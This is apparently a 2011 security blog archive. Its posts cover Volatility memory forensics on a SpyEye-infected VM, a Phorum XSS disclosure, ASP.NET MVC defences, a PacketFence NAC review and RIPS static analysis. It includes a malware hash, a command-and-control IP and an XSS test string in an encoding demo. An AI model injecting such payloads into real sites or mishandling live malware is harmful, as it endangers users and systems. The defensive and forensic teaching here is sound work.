On a victim system (local or via psexec) running DumpIt is as easy as executing DumpIt.exe from the command-line or Windows Explorer. The raw memory dump will be generated and written to the same directory you’re running DumpIt from; answer yes or no when asked if you wish to continue and that’s all there is to it. A .raw memory image named for the hostname, date, and UTC time will result. DumpIt is ideal for your incident response jump kit; deploy the executable on a USB key or your preferred response media.

Figure 1: Run DumpIt

Painless and simple, yes? I ran DumpIt on a Windows XP SP3 virtual machine that had been freshly compromised with SpyEye (md5: 00B77D6087F00620508303ACD3FD846A), an exercise that resulted in my being swiftly shunted by my DSL provider. Their consumer protection program was kind enough to let me know that “malicious traffic was originating from my account." Duh, thanks for that, I didn’t know. ;-)

Clearly, it’s time to VPN that traffic out through a cloud node, but I digress.

SpyEye has been in the news again lately with USA Today Tech describing a probable surge in SpyEye attacks due to increased availability and reduced cost from what used to be as much as $10,000 for all the bells and whistles, down to as little as $95 for the latest version. Sounds like a good time for a little SpyEye analysis, yes?

I copied the DumpIt-spawned .raw image from the pwned VM to my shiny new SIFT 2.1 VM and got to work.

Volatility 2.0

So much excellent documentation exists for Volatility; on the Wiki I suggest you immediately read the FAQ, Basic Usage, Command Reference, and Features By Plugin.

As discussed in May 2010’s toolsmith on SIFT 2.0, you can make use of Volatility via PTK, but given that we’ve discussed that methodology already and the fact that there are constraints imposed by the UI, we’re going to drive Volatility from the command line for this effort. My memory image was named HIOMALVM02-20110811-165458.raw by DumpIt; I shortened it to HIOMALVM02.raw for ease of documentation and word space.
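If you collect more than a handful of images, the DumpIt naming scheme is easy to parse for triage notes. The following is a minimal Python sketch, assuming the HOSTNAME-YYYYMMDD-HHMMSS.raw layout seen in the file name above; the function name is my own and not part of DumpIt.

```python
from datetime import datetime, timezone
from pathlib import Path


def parse_dumpit_name(filename):
    """Split a DumpIt-style image name into (hostname, UTC capture time).

    Assumes the HOSTNAME-YYYYMMDD-HHMMSS.raw layout seen in this article.
    """
    stem = Path(filename).stem  # drop the .raw extension
    # Split from the right so hostnames that contain hyphens stay intact.
    hostname, date_part, time_part = stem.rsplit("-", 2)
    captured = datetime.strptime(date_part + time_part, "%Y%m%d%H%M%S")
    return hostname, captured.replace(tzinfo=timezone.utc)


host, when = parse_dumpit_name("HIOMALVM02-20110811-165458.raw")
print(host, when.isoformat())
```

Splitting from the right is a deliberate choice here: the date and time fields have a fixed shape, while a hostname may contain hyphens of its own.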

I executed vol.py imageinfo -f HIOMALVM02.raw to confirm just that, image information. This plugin provided PAE (physical address extension) status as well as hex offsets for DTB (Directory Table Base), KDBG (short for _KDDEBUGGER_DATA64), KPCR (Kernel Processor Control Region), time stamps and processor counts.

Figure 2: imageinfo plugin results

Windows XP SP3, check.

Runtime analysis of my SpyEye sample gave me a few queryable entities to throw at Volatility for good measure, but we’ll operate here as if the only information we have is a suspicion of system compromise.

It’s always good to see what network connections may have been made.

vol.py --profile=WinXPSP3x86 connscan -f HIOMALVM02.raw

The connscan plugin scans physical memory for connection objects.

Results included:

Interesting: both IPs are in Germany. My VMs don’t make known good connections to Germany, so let’s build from here.

The PID associated with the second connection to 188.40.138.148 over port 80 is 1512.

The pslist plugin prints active processes by walking the PsActiveProcessHead linked list.

vol.py --profile=WinXPSP3x86 pslist -P -f HIOMALVM02.raw

Use -P to acquire the physical offset for a process rather than the virtual offset, which is the default.

Results included a number of PPID (parent process IDs) that matched the 1512 PID from connscan:

I highlighted the process that jumped out at me given the anomalous time stamp, a 0 thread count and no handles.
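The triage logic used here (find the children of a PID of interest, then flag any with no threads and no handles) can be sketched in a few lines of Python. This is only an illustration: the cleansweep.exe row reflects the PID, PPID, and zero thread and handle counts discussed in this article, while every other row, name, and count is made up for the example.

```python
from dataclasses import dataclass


@dataclass
class Proc:
    name: str
    pid: int
    ppid: int
    threads: int
    handles: int


# Only the cleansweep.exe PID/PPID and its zero thread/handle counts come
# from the article; every other row is hypothetical filler.
procs = [
    Proc("parent.exe", 1512, 1400, 12, 300),   # hypothetical name and counts
    Proc("child-a.exe", 2040, 1512, 3, 45),    # hypothetical
    Proc("cleansweep.exe", 3328, 1512, 0, 0),
    Proc("other.exe", 900, 700, 8, 120),       # hypothetical
]


def children_of(procs, ppid):
    """Return every process whose parent PID matches ppid."""
    return [p for p in procs if p.ppid == ppid]


def looks_dead(proc):
    """A process with no threads and no handles should not still be listed."""
    return proc.threads == 0 and proc.handles == 0


suspects = [p for p in children_of(procs, 1512) if looks_dead(p)]
for p in suspects:
    print(p.name, p.pid)
```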

Let’s check for additional references to cleansweep.

The pstree plugin prints the process list as a tree so you can visualize the parent/child relationships.

vol.py --profile=WinXPSP3x86 pstree -f HIOMALVM02.raw

Results included the PPID of 1512, and the Pid for cleansweep.
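If you find yourself repeating these invocations across several images, a small wrapper keeps them consistent. The sketch below only builds the argument lists for the three commands shown so far, using the same flags and ordering as above; the helper name is my own, and actually running the result (for example with subprocess.run) assumes vol.py is on your path, as it is on SIFT.

```python
def vol_command(plugin, image, profile=None, extra=()):
    """Build a vol.py argument list in the same order used in this article."""
    cmd = ["vol.py"]
    if profile:
        cmd.append("--profile=" + profile)
    # Plugin name first, then plugin-specific switches, then the image file.
    cmd += [plugin, *extra, "-f", image]
    return cmd


IMAGE = "HIOMALVM02.raw"
PROFILE = "WinXPSP3x86"

for plugin, extra in [("connscan", ()), ("pslist", ("-P",)), ("pstree", ())]:
    print(" ".join(vol_command(plugin, IMAGE, PROFILE, extra)))
```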

Ah, the victim most likely downloaded cleansweep.exe and executed it via Windows Explorer.

But can we extract actual binaries for analysis via the likes of Virus Total? Of course.

This is where the malware plugins are very helpful. I already know I’m not going to have much luck exploring PID 3328 as it has no threads or open handles. MHL points out that a process such as cleansweep.exe typically can't remain active with 0 threads as a process is simply a container for threads, and it will terminate when the final thread exits. Cleansweep.exe is still in the process list probably because another component of the malware (likely the one that started cleansweep.exe in the first place) never called CloseHandle to properly "clean up." That said, the PPID of 1512 has clearly spawned PID 3328 so let’s explore the PPID with the malfind plugin, which extracts injected DLLs, injected code, unpacker stubs, and API hook trampolines. The malware (malfind) plugins don't come packaged with Volatility, but are in fact a part of the above mentioned Malware Analyst's Cookbook; the latest version can also be downloaded.

vol.py --profile=WinXPSP3x86 -f HIOMALVM02.raw malfind -p 1512 -D output/ yielded PE32 gold as seen in Figure 3.

Figure 3: malfind plugin results

Malfind dropped each of the suspicious PE files it discovered to my output directory as .dmp files. I submitted each to Virus Total, and bingo, all three were malicious and identified as SpyEye variants as seen in Figure 4.
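When several dumps come out of a run, recording a hash for each one makes it easier to keep notes straight and to match files against scan results later. A minimal sketch, assuming the dumps sit in the output directory used above with a .dmp extension; the function name is my own.

```python
import hashlib
from pathlib import Path


def hash_dumps(directory, pattern="*.dmp"):
    """Return {file name: {"md5": ..., "sha256": ...}} for matching files."""
    results = {}
    for path in sorted(Path(directory).glob(pattern)):
        data = path.read_bytes()
        results[path.name] = {
            "md5": hashlib.md5(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest(),
        }
    return results


if __name__ == "__main__":
    for name, digests in hash_dumps("output").items():
        print(name, digests["md5"], digests["sha256"])
```

Reading each file fully into memory is fine for small extracted PE files; for anything large you would want to hash in chunks instead.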

Figure 4: PE results from Virus Total

In essence, we’ve done for ourselves via memory analysis what online services such as Threat Expert will do via runtime analysis. Compare this discussion to the Threat Expert results for the SpyEye sample I used.

There is so much more I could have discussed here, but space is limited and we’ve pinned the VU meter in the red, so go read the Malware Cookbook as well as all the online Volatility resources, and push Volatility to the boundaries of your skill set and imagination. In my case the only limiting factors were constraints on my time and my lack of knowledge. There are few limits imposed on you by Volatility; 64bit and Linux analysis support are pending. Get to it!

In Conclusion

I’ve said it before and I’ll say it again. I love Volatility. Volatility 2.0 makes me squeal with delight and clap my hands like a little kid at the state fair. Oh the indignity of it all, a grown man cackling and clapping when he finds the resident evil via a quick memory image and the glorious volatile memory analysis framework that is Volatility.

An earlier comment from MHL bears repeating here. Volatility source code can be likened to “a Python version of the Windows Internals book, since you can really learn a lot about Windows by just looking at how Volatility enumerates evidence.” Yeah, what he said.

Do you really need any more motivation to explore and use Volatility for yourself?

There’s a great list of samples to grab and play with. Do so and enjoy! As it has for me, this process will likely become inherent to your IR and forensic efforts, perhaps even surpassing other tactics and methods as your preferred, go-to approach.

Ping me via email if you have questions (russ at holisticinfosec dot org).

Cheers…until next month.

Acknowledgements

Mike Auty & Michael Hale Ligh of the Volatility project.

AAron Walters – Volatility lead

Monday, August 29, 2011

Phorum Phixes Phast

I was paying a visit to the FreeBSD Diary reading Dan Langille's post grep, sed, and awk for fun and profit (a great read, worthy of your time) when my Spidey sense kicked in.

Specific to log messaging he'd created for captcha failures, Dan mentioned that "these messages are created by some custom code I have added to Phorum."

Oh...Phorum, CMS/BBS/forum/gallery software I'd not seen before.

I installed Phorum 5.2.16 in my test environment, ran it through my normal web application security testing regimen, and found a run-of-the-mill cross-site scripting (XSS) bug. There's no real story there, just another vuln in a realm where they are commonplace.

What is not commonplace in this tale though is the incredibly responsive, timely, and transparent nature with which the Phorum project's Thomas Seifert addressed this vulnerability. I truly appreciate devs and teams like this. He even kindly tolerated my completely misreading the Github commit's additions and deletions.

August 22nd - XSS vuln advisory submitted to security@phorum.org. Yay! They have a security alias, and they read what's submitted to it. :-)

August 25th - Thomas replies and says "Thanks for your report.

We fixed the issue in the git repository, https://github.com/Phorum/Core/commit/c1423ebfff91218a4c1b31047d6baf855603cc91, and will push out a new release in the next 2 days." Sweet, not only is the project responsive and transparent, they're open with their source and change management.

August 26th - Thomas replies again, Phorum 5.2.17 is live. "Release is out:

http://www.phorum.org/phorum5/read.php?64,149490,149490#msg-149490." Outstanding! And a day earlier than the suggested release window. Advisory published.

One need only read the changelog to see the level of dedication and commitment Thomas and team afford their project.

Nothing else to say but bloody well done. Thank you, Thomas and the Phorum team. More smiles and less middle finger make for happier security grunts.

Cheers.

Sunday, August 28, 2011

ASP.NET vs. ASP.NET.MVC & security considerations

I just read a recent Dr. Dobb's article, as posted in Information Week and online, that provides perspective regarding moving from ASP.NET to ASP.NET.MVC.

Some quick highlights from the article to frame this discussion.

First, ASP.NET.MVC applies the "Model-View-Controller (MVC) to ASP.NET. The MVC pattern, which is frequently used in the design of web sites, aims to separate data, business logic, and the presentation to the user. The challenge in many cases is keeping business logic out of the presentation layer; and careful design based on MVC greatly reduces the prospect of this intermingling."

Second, the various perspectives.

ASP.NET.MVC upside:

"ASP.NET MVC is technically superior to ASP.NET Web Forms because, having been released five years later, it addresses the business and technology changes that have occurred during the intervening period — testability, separation of concerns, ease of modification, and so on."

The ASP.NET.MVC vs ASP.NET middle ground:

"When it comes to the core function, however, there is nearly no difference."

The ASP.NET.MVC downside:

"ASP.NET MVC has greater startup costs. And in some applications, ASP.NET MVC is a substantial turnaround from ASP.NET Web Forms."

I have no take on these positions either way; they all seem reasonable, but the topic triggered dormant thoughts for me bringing back to mind some interesting work from a couple of years ago.

The Dr. Dobb's M-Dev article, while clearly operating from the perspective of development and deployment, does not discuss some of the innate security features available to ASP.NET.MVC users that I think help give it an edge.

Preventing Security Development Errors: Lessons Learned at Windows Live by Using ASP.NET MVC is a November 2009 paper that I've already discussed and is well worthy of another read in this context.

I'll use this opportunity to simply remind readers of ASP.NET.MVC's security-centric features, including available tutorials.

1) Preventing Open Redirection Attacks

Open redirection (CWE-601) is easily prevented with ASP.NET.MVC 3 (code can be added with some modification to ASP.NET MVC 1.0 and 2 applications).

In short, the ASP.NET MVC 3 LogOn action code has been changed to validate the returnUrl parameter by calling a new method in the System.Web.Mvc.Url helper class named IsLocalUrl(). This ASP.NET.MVC tutorial is drawn from Jon Galloway's blog.
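To make the idea concrete outside of .NET, here is a minimal Python sketch of the same kind of check: accept a return URL only if it is an application-relative path, and fall back to a default otherwise. This is not a port of IsLocalUrl() and is deliberately stricter than it needs to be; the function names and the default path are my own assumptions.

```python
def is_local_url(url):
    """Return True only for app-relative paths such as "/Home/Index".

    A conservative check in the spirit of IsLocalUrl(), not a port of it.
    """
    if not url:
        return False
    # Reject backslashes and control characters that browsers may normalize.
    if any(ch in url for ch in "\\\r\n\t"):
        return False
    # One leading slash only: "//host" and "http://host" are both rejected.
    return url.startswith("/") and not url.startswith("//")


def safe_redirect_target(return_url, default="/"):
    """Use the caller-supplied URL only when it stays on this site."""
    return return_url if is_local_url(return_url) else default


print(safe_redirect_target("/Account/Profile"))
print(safe_redirect_target("http://evil.example/phish"))
```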

2) Prevent CSRF

From the Windows Live paper:

"To defend a Web site against XSRF attacks, ASP.NET MVC provides AntiForgeryToken helpers. These consist of a ValidateAntiForgeryToken attribute, which the developer can attach to controller classes or methods, and the Html.AntiForgeryToken() method."

3) JSON hijacking

Casaba contributed to the Windows Live paper. From their blog:

"For JSON hijacking, they ensure that the JSON result included a canary check by default. This prevented developers from being able to return JSON without a canary, thus preventing JSON hijacking."

Much like the CSRF mitigation, the canary check comes through again.

The Windows Live method defined a custom ASP.NET MVC Action Filter attribute to define the HTTP verbs they would accept and ensure that each action required the use of a canary.
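The canary idea behind both the CSRF and JSON hijacking mitigations can be sketched generically: only accept approved HTTP verbs, and only when the request carries a value the attacker cannot guess. The Python below is an illustration of that concept using an HMAC over a session identifier; it is not how ASP.NET MVC or the Windows Live action filter is implemented, and the names and the secret handling are assumptions for the example.

```python
import hashlib
import hmac
import secrets

SECRET_KEY = secrets.token_bytes(32)  # hypothetical per-application secret


def issue_canary(session_id):
    """Derive a canary bound to one session (HMAC-SHA256, hex encoded)."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def allow_request(method, session_id, submitted_canary, allowed_verbs=("POST",)):
    """Accept a request only if its verb is allowed and its canary matches."""
    if method.upper() not in allowed_verbs:
        return False
    expected = issue_canary(session_id).encode()
    supplied = (submitted_canary or "").encode()
    return hmac.compare_digest(expected, supplied)  # constant-time comparison


canary = issue_canary("session-123")
print(allow_request("POST", "session-123", canary))    # allowed verb, matching canary
print(allow_request("GET", "session-123", canary))     # verb not in the allowed list
print(allow_request("POST", "session-123", "forged"))  # canary does not match
```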

It's also a straightforward process to prevent JavaScript injection & cross-site scripting (XSS) in the ASP.NET.MVC View or Controller via Html.Encode where you:

a) HTML encode any data entered by website users when you redisplay the data in a view

b) HTML encode the data just before you submit the data to the database

See Stephen Walther's tutorial for more.
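The encoding step itself is language-agnostic. As a rough Python analogue of encoding user input when it is redisplayed (option a above), the standard library's html.escape does the job; the render_comment helper is a made-up name for illustration.

```python
import html


def render_comment(user_text):
    """Wrap user-supplied text in a paragraph, HTML-encoding it first."""
    return "<p>" + html.escape(user_text, quote=True) + "</p>"


print(render_comment('<script>alert("xss")</script>'))
```

With the input encoded, the browser displays the script tag as text rather than executing it.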

In summary, in addition to ASP.NET.MVC's development and functionality features, perhaps these security-centric features may help you decide to make the move to ASP.NET.MVC.

Cheers.

Wednesday, August 03, 2011

toolsmith: PacketFence - Open Source NAC

Reprinted with permission for the author only from the August 2011 ISSA Journal

Introduction

An old boss of mine always found a way to blame the vast majority of security-related problems on “the fuzzy neural network behind the keyboard.” Yep, users; what would our lives be without them? There are a plethora of ways, methods, and manner with which to protect your critical assets and networks from said users, amongst them Network Access Control or NAC. A variety of commercial NAC solutions are offered; you may also have heard or read discussions regarding the nuance between Cisco’s Network Admission Control and Microsoft’s Network Access Protection. As such solutions are proprietary and have costs associated with them, we’ll steer clear of any debate and discuss an outstanding free and open source (FOSS) solution, as is the toolsmith norm.

PacketFence is a fully supported (tiered support, bronze to platinum, is available, as well as consultation hours or full deployment services) NAC system that is in use in financial, education, engineering, and manufacturing sectors, to mention a few. It’s used right here in my own backyard at Seattle Pacific University and is considered a trusted and indispensable resource. PacketFence sports a robust feature set including a captive-portal for registration and remediation, centralized wired and wireless management, 802.1x support, Layer-2 isolation of problematic devices, as well as integration with both Snort IDS and Nessus.

PacketFence is supported and maintained by Inverse, a Montreal-based firm. PacketFence development is helmed by Olivier Bilodeau, Inverse’s System Architect.

Olivier provided me with an update on PacketFence news and developments as I prepared for this article.

As Inverse is an open source company generating its revenue via services, the PacketFence roadmap is strongly influenced by customer demand and as such sometimes moves in a different direction than the public roadmap.

Expect the following in the next major release, 3.0 (likely mid-August):

- Completely re-designed Captive Portal

- Guest API that, with little effort, allows a lot of different guest management workflows (email confirmation, self-registration, pre-registration, SMS confirmation, hotel-style code generation, etc.)

branch and now they think it's ready to be merged in for the pending 3.0 release.

Inverse has also been working on other features that may or may not make it to 3.0 including:

- Ability to run PacketFence in out-of-band and inline mode at the same time

- Pushing ACLs/Roles per device/user on the edge. This would allow for more granular control over who has access to what, without VLAN management overhead, and enforced at the edge instead of at the firewall. They are also experimenting with applying QoS the same way.

- Integration with RADIUS Accounting to track bandwidth consumption per user and potentially enforce bandwidth usage restrictions

Inverse maintains PacketFence installations where there are more than a thousand switches and even more access points, including several customers who crossed the '25,000 devices handled by PacketFence' line in the last two years or so. As such, Olivier strongly affirms that PacketFence competes with big brand commercial offerings on cost, features, and scalability.

In addition to keeping an eye on PacketFence.org, you’re encouraged to subscribe to the PacketFence Twitter feed to stay abreast of what they’re working on: @packetfence

Finally, if you’re going to be in Las Vegas for Defcon 19, be sure to check out Olivier’s presentation, PacketFence, The Open Source NAC: What We've Done in the Last Two Years.

Installation/Configuration

First, PacketFence is supported by rich documentation; I’ll only cover some details that were directly applicable to my experience setting it up in the toolsmith lab.

Core to a sound PacketFence installation is a supported switch. Refer to the PacketFence version 2.2.1 Network Devices Configuration Guide for device specifics. I used a Cisco Catalyst 3548 XL for this effort but said switch is rather dated. The Catalyst 3548 XL does not support 802.1X, the preferred port-based Network Access Control method, so I was limited to MAC detection/isolation and was not able to push PacketFence nearly to the extent I would have liked to.

Inverse includes a VMWare appliance, aptly named ZEN (Zero Effort NAC), perfect for folks wishing to assess a fully installed and preconfigured version of PacketFence 2.2.1 when on a tight timeline. Again, there is a PacketFence ZEN version 2.2.1 Installation Guide to support your efforts in full.

Note: the ZEN VMWare appliance version of PacketFence requires a 64-bit capable system.

For those of you planning dedicated installations, the recommended distributions are RHEL 5 or CentOS 5 for which Inverse offers a yum repository.

If you intend to investigate PacketFence via the ZEN appliance, you’ll need to configure your supported switch as follows:

- VLAN 1 - management VLAN

- VLAN 2 - registration VLAN (unregistered devices will be put in this VLAN)

- VLAN 3 - isolation VLAN (isolated devices will be put in this VLAN)

- VLAN 4 - MAC detection VLAN (empty VLAN: no DHCP, no routing, no nothing)

- VLAN 5 - guest VLAN

- VLAN 10 - “regular” VLAN

Refer to the IP and subnet table on page 7 of the ZEN Installation Guide for network configurations per VLAN; DHCP and DNS services are provided by PacketFence ZEN.

I set the switch up with an IP address of 10.0.10.2 and on interface fa0/48 I defined the port as a dot1q trunk (several VLANs on the port) with VLAN 1 as the native (untagged) VLAN as required for the PacketFence ZEN host.

This is easily done on a Cisco switch as follows:

enable

conf term

int fa0/48

switchport trunk encapsulation dot1q

switchport mode trunk

end (Cntrl Z)

The ZEN VM appliance is preconfigured to match interfaces to VLANs, just be sure they’re all set to bridged under VM --> Settings --> Network Adapter.

If all is configured properly, and your ZEN VM appliance is connected to the dot1q trunk interface, you should be able to browse to https://192.168.1.10:1443 and make use of the PacketFence UI.

Note: You’ll discover a slight mismatch between the PacketFence ZEN guide and the network configuration guide where the network configuration guide describes the PacketFence host IP as 192.168.1.5. If you’re going with the ZEN installation guidance and using the ZEN VM, the PacketFence VM appliance IP is 192.168.1.10.

The PacketFence work flow exemplifies a network “perfect world” in my opinion. A host that joins the network does so in a limited capacity (no Internet or access) via MAC detection (VLAN4) and is then shunted to registration (VLAN2). Upon successful registration a host continues either as a guest (VLAN5) or an approved system for normal access (VLAN10).
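That flow is easy to reason about as a small state table. The sketch below models the ZEN VLAN layout listed earlier and the transitions just described; it is purely a mental model written in Python, not PacketFence code or configuration, and the next_vlan helper and its parameters are hypothetical.

```python
# VLAN IDs and roles as laid out for the ZEN appliance in this article.
VLANS = {
    1: "management",
    2: "registration",
    3: "isolation",
    4: "MAC detection",
    5: "guest",
    10: "regular",
}


def next_vlan(current, registered=False, guest=False, violation=False):
    """Hypothetical helper: where a host moves next in the described flow."""
    if violation:
        return 3                      # hosts in violation are isolated
    if current == 4:
        return 2                      # detected by MAC, sent to registration
    if current == 2 and registered:
        return 5 if guest else 10     # guest access or normal access
    return current                    # otherwise stay put


for step in (next_vlan(4), next_vlan(2, registered=True), next_vlan(10, violation=True)):
    print(step, VLANS[step])
```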

Figure 1 offers a node view including all the unregistered hosts identified by my test instance of PacketFence.

Figure 1 - PacketFence Nodes

PacketFence includes a database of known fingerprints and user-agents for ready system identification, and will flag unknowns as seen in Status --> Reports. PacketFence ironically flagged my Barnes & Noble Nook as seen in Figure 2, most likely because I blew the proprietary B & N OS away and loaded it with CyanogenMod 7.1.0 RC1 (Android 2.3.4), which rocks, by the way.

Figure 2 - PacketFence flags hacked Nook fingerprint as unknown

Out of the gate, PacketFence also detected my normal DHCP service and flagged mine as rogue, tagging it as in violation as seen right in the PacketFence Status view depicted in Figure 3.

Legitimate DHCP servers can be added to the pf.conf file preventing alarms for these servers.

DHCP is also run in Registration and Isolation VLANs but it’s recommended that users manage their own DHCP servers for the Normal VLANs.

Figure 3 - PacketFence Status

As a security wonk my favorite PacketFence features are, of course, security-related:

- Detection of abnormal network activity (Snort) where PacketFence defines alerting and suppression coupled with administratively configurable actions

- Proactive vulnerability scans (Nessus) conducted during registration, as scheduled, or on an adhoc basis

- Isolation for hosts in violation and remediation through a captive portal including logic that distributes the appropriate counsel for violators including banned devices (“You have been detected using a device that has been explicitly disallowed by your network administrator.”) and malware (“Your system has been found to be infected with malware. Due to the threat this infection poses for other systems on the network, network connectivity has been disabled until corrective action is taken.”)

Once a host is registered it can be added to a category; I arbitrarily defined Trusted Hosts via Nodes --> Categories.

PacketFence offers extensive reporting with output to CSV and the UI, enhanced by extensive filtering.

Figure 4 shows a report by registered host with details.

Figure 4 - Registered Host Report

As you build out and experiment, be sure to take a close look at Configuration settings. You can define/modify interfaces, networks, switches, and fine tune the language included in messages distributed to violators trapped in the captive portal.

In Conclusion

PacketFence is an outstanding offering and my only regret is not being able to commit more time to testing or push its feature set. It left me feeling nostalgic for the days when I was a network systems administrator configuring devices and network security on a regular basis.

Don’t limit your thinking specific to PacketFence; while it’s a great solution for small/medium business, it really can handle the enterprise as well.

Remember the documentation is extensive. Make use of it to get fully wrapped around ALL of PacketFence’s capabilities, then test and deploy.

PacketFence is definitely one of my candidates for Tool of the Year.

Ping me via email if you have questions (russ at holisticinfosec dot org).

Cheers…until next month.

Acknowledgements

Olivier Bilodeau, Inverse System Architect, PacketFence project lead

Friday, July 22, 2011

APWG Survey and deja vu all over again

As a participant in the APWG IPC, and a contributing researcher, I was pleased to see Dave Piscitello's APWG Web Vulnerabilities Survey Results and Analysis get some press coverage as it went live in mid-June.

Rather than focus on the survey results (you can read those for yourself), I'd like to focus briefly on mitigation and concerns.

The Results and Analysis-compiled responses "suggest that web sites would benefit from broader implementation of preventative measures to mitigate known vulnerabilities and also from monitoring for anomalous behavior or suspicious traffic patterns that may indicate previously unseen or zero day attacks."

Given the broad scope of CMS platforms, forums, galleries, wikis, shopping carts, and others riding on top of the popular LAMP stack, the absence of such preventative measures and monitoring makes for hacker nirvana.

Consider the problems shared servers introduce where vulnerabilities in any of the above-mentioned applications preloaded for on demand end-user deployment via cPanel (not to mention cPanel vulnerabilities) can lead to "game over."

Clearly there are challenges: resources, level of commitment to security by site operators, and hosting provider scrutiny to mention a few.

The problem is not new.

When pending Black Hat presentations are describing tool sets such as Diggity "that speed the process of finding security vulnerabilities via Google or Bing", or Embedded Web Servers Exposing Organizations To Attack, you know it's Groundhog Day. Great tool set (Diggity), but that we're still unfortunately talking about the ease with which hacker groups are finding "opportunities" is troubling to say the least.

When #3 on Kelly Jackson Higgins' list of suggestions to repel attackers states "eliminate SQL injection, XSS, other common website flaws" it's deja vu all over again.

The APWG Web Vulnerabilities Survey asked "What actions did you take to stop the attack?" Compiled answers resulted in data such as:

We patched or updated vulnerable software packages 21%

We had our developers fix our custom software 8%

While other results lean heavily towards security misconfiguration issues, there are still clear opportunities to improve SDL/SDLC practices.

As the survey report indicates, "This article barely scratches the surface of the intelligence the APWG IPC has accumulated from the Web Vulnerability Survey. A complete analysis of the survey results—with specific recommendations, remedies, and practices."

I'm in the midst of research focusing on the scanning and misconfiguration elements of Internet Background Radiation (IBR) using a variety of Web logs. This research still points back to the above mentioned problem space and suggestions, but will drive deeper into attacker and victim trends and traits. This work, coupled with earlier web application security research will feed the analysis paper pending publication by the APWG IPC.

My hope is to also present the IBR work at an upcoming security conference along with a paper or article.

Stay tuned.

Monday, July 18, 2011

Mark Russinovich presenting at ISSA Puget Sound

A quick note to any Seattle-area readers.

ISSA Puget Sound is proud to have Mark Russinovich as this month's speaker, presenting Zero Day Malware Cleaning with the Sysinternals Tools, Thursday, July 21st, 6:00 - 8:30 pm, Building E, 5600 148th Ave NE, Redmond, WA 98052 (Microsoft RedWest campus - max capacity (145))

This is an RSVP only event; please visit the ISSA Puget Sound website for all the details.

Mark will be offering both his recent books, Zero Day: A Novel and Windows Sysinternals Administrator's Reference for sale and will be signing them as well.

If you're in the area, please RSVP and attend this outstanding event and opportunity.

Monday, July 04, 2011

toolsmith: RIPS - PHP static code analyzer

In July's toolsmith I admit to the fact that I’ve often focused on run-time web application security assessment tools and paid absolutely no attention to static analysis tools.

For those of you in a similar boat, RIPS is a static source code analyzer for vulnerabilities in PHP. RIPS is written by Johannes Dahse who uses it when he audits PHP code, often during Capture The Flag contests.

To test RIPS in all its glory, I compared its functionality to known findings from a vulnerability disclosure and advisory I posted for Linpha 1.3.4 in March 2009. Linpha 1.3.4 is a photo/image gallery (no longer supported or maintained) which exhibited cross-site request forgery (CSRF) and cross-site scripting (XSS) vulnerabilities during runtime analysis.

Specifically, input passed via GET to the imgid parameter is not properly sanitized by the image_resized_view.php script before being returned to the user. This vulnerability can be exploited to execute arbitrary HTML and JavaScript code in a user’s browser session in the context of an affected site.

To compare this finding to source code analysis with RIPS, I loaded /var/www/linpha/actions/image_resized_view.php in the RIPS UI and clicked scan.

The results were immediate and clearly identified in source code the same vulnerability I’d discovered at run-time, as seen in Figure 1.

Figure 1

Note that RIPS tags the imgid parameter as vulnerable right out of the gate.
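For a feel of what source-to-sink matching means, here is a deliberately naive Python sketch that flags PHP lines where user input reaches an output statement without passing through a sanitizer. It is a line-based heuristic of my own for illustration, not how RIPS is implemented, and RIPS does considerably more than this; the pattern lists and the sample PHP are assumptions.

```python
import re

# Hypothetical, deliberately small lists; a real analyzer tracks far more.
SOURCE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[\s*['\"](\w+)['\"]\s*\]")
SINK = re.compile(r"\b(echo|print)\b")
SANITIZER = re.compile(r"\b(htmlspecialchars|htmlentities|intval)\s*\(")

def find_tainted_output(php_source: str):
    """Return (line number, parameter name) where input is echoed unsanitized."""
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        source = SOURCE.search(line)
        # Flag only lines with a source, an output sink, and no sanitizer call.
        if source and SINK.search(line) and not SANITIZER.search(line):
            findings.append((lineno, source.group(2)))
    return findings

# Made-up PHP for the demo; not taken from Linpha.
sample = """<?php
$id = intval($_GET['albid']);
echo '<img src="view.php?imgid=' . $_GET['imgid'] . '">';
echo htmlspecialchars($_GET['name']);
"""
print(find_tainted_output(sample))
```

A heuristic like this misses input that is first assigned to a variable and echoed later, which is exactly the sort of data flow a real static analyzer has to follow.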

RIPS is becoming more and more feature-rich with each new release; while it's a work in progress, it’s already quite effective and Johannes is actively developing it. You'll enjoy the code viewing and exploit creation functionality, but one of my favorite new features is the graphical representation of scanned files and includes, showing “how files are connected to each other, what files accept sources (userinput) and what files have sensitive sinks or vulnerabilities” as seen in Figure 2.

Figure 2

Check out the RIPS article here, and download RIPS and Johannes' white paper here.

Cheers.

Thursday, June 30, 2011

You can't patch stupid...

The only thing this incredibly witty site is lacking is a McAfee Secure or Scanless PCI badge. ;-)

http://ismycreditcardstolen.com

Watching mailing lists debate if it's legit or not? Priceless...

In other breaking news, “There’s no device known to mankind that will prevent people from being idiots,” said Mark Rasch, director of network security and privacy consulting for Falls Church, Virginia-based Computer Sciences Corp. (CSC).

Woot! To the fuzzy, neural networks behind the keyboards, step back.

What would life be without users?

Cheers.

Friday, June 03, 2011

APT: anti-hype, reality checks, and resources

This post is my 200th for HolisticInfoSec, and I mark it with particular consideration for the topic, coupled with profound recognition of the process that led to this discussion.

As a graduate student enrolled in the SANS Technology Institute's MSISE program, I recently completed the Joint Written Project requirement.

My partners and I were assigned the topic Assessing Outbound Traffic to Uncover Advanced Persistent Threat.

I hold my partners in the highest regard; participating in this project with Beth Binde and MAJ TJ O'Connor was quite simply one of the most rewarding efforts of my professional career. The seamless, efficient, tactful, and cooperative engagement practiced throughout the entire 30-day period allowed for completion of the assignment and resulted in what we hope readers will consider a truly useful resource in the battle against APT.

Amongst positions taken for this paper is a simple premise: there are tactics that can be applied in the enterprise to detect and defend against APT that do not require expensive, over-hyped, buzzword-laden vendor solutions.

Think I'm kidding about buzzwords and hype?

Following are real conversations overheard in the aisles at (ironically) the RSA Conference.

1) What is the ROI on your SEM, and will it detect any APTs on my LAN?

2) Does the TCO justify spend for a SaaS/cloud solution; you know, an MSSP?

3) Wait, what about APT in the cloud? If I use a SaaS-based SEM to manage events on my cloud-based services, will it still find APTs?

All opportunities for chastisement and disdain aside, commercial solutions clearly are an important part of the puzzle but are far from preeminent as the only measure of detection and defense.

Instead, Assessing Outbound Traffic to Uncover Advanced Persistent Threat proposes that:

